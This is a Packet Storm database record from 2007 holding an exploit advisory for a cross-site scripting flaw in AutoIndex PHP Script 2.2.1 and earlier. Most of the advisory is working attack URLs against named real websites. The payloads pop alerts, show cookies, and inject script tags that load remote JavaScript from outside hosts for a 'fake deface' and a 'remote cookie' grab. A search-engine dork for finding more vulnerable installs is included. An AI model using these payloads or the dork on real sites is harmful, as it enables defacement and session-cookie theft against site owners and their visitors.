DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:58848", "type": "packetstorm", "bulletinFamily": "exploit", "title": "autoindexXSS.txt", "description": "", "published": "2007-08-25T00:00:00", "modified": "2007-08-25T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/58848/autoindexXSS.txt.html", "reporter": "d3hrdr8", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:18:45", "viewCount": 10, "enchantments": {"score": {"value": -0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/58848/autoindexXSS.txt", "sourceData": "` \n# Title : AutoIndex PHP Script search_mode Cross-Site Scripting Vulnerability \n \n# Description : AutoIndex PHP Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. \n \n# Software : http://autoindex.sourceforge.net/ \n \n# Vuln. Version : <= 2.2.1 \n \n# Author : d3hydr8 \n \n# Contact : d3hydr8[at]gmail[dot]com \n \n# Homepage : http://darkcode.h1x.com \n \n# Original Post : http://darkcode.h1x.com/forum/index.php?action=vthread&forum=12&topic=243 \n \n# Dork : intext:\"Powered by AutoIndex PHP Script\" or inurl:/AutoIndex/index.php \n \n# Greets : mozi, whoami, icqbomber \n \n# Proof : \n \nSimple Alert: \nhttp://www.flapjack.be/AutoIndex/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E \nhttp://www.projectopensky.com/files/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E \nhttp://scizz.com/rhtools/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E \n \nFake Deface: \nhttp://buraaq.net/AutoIndex/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E \n \nhttp://archsymb.com/ruby/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E \n \ncookie: \nhttp://boxorroxors.net/downloads.php?search=asdf&search_mode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n \n \nremote cookie: \nhttp://tor.meulie.net/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3 \n \n \n \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647916613, "score": 1659769055}}

{}